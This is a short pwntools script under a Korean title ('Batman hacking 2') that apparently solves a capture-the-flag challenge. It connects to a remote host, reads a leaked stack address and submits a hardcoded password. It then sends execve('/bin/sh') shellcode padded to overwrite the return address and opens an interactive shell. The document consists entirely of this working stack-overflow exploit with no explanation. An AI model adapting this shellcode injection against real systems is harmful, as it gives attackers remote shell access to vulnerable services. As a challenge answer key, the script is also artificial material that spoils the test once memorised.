옹야잉 배트맨 해킹 2

from pwn import *

 

p = remote("159.65.17.93", 32640)

 

print(p.recvuntil(">"))

p.sendline("1")

 

leak = p.recvline()

leak = leak.strip("It was very hard, but Alfred managed to locate him: ")

shellcode_addr = int(leak, 16)

 

print(p.recvuntil(">"))

p.sendline("2")

 

p.recvuntil("password:")

p.sendline("b4tp@$$w0rd!")

print(p.recvuntil("commands: "))

 

shellcode = ""

shellcode += "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"

shellcode += "0"*(84-len(shellcode))

shellcode += p64(shellcode_addr)

 

p.sendline(shellcode)

print(p.recvuntil(">"))

p.sendline("3")

 

p.interactive()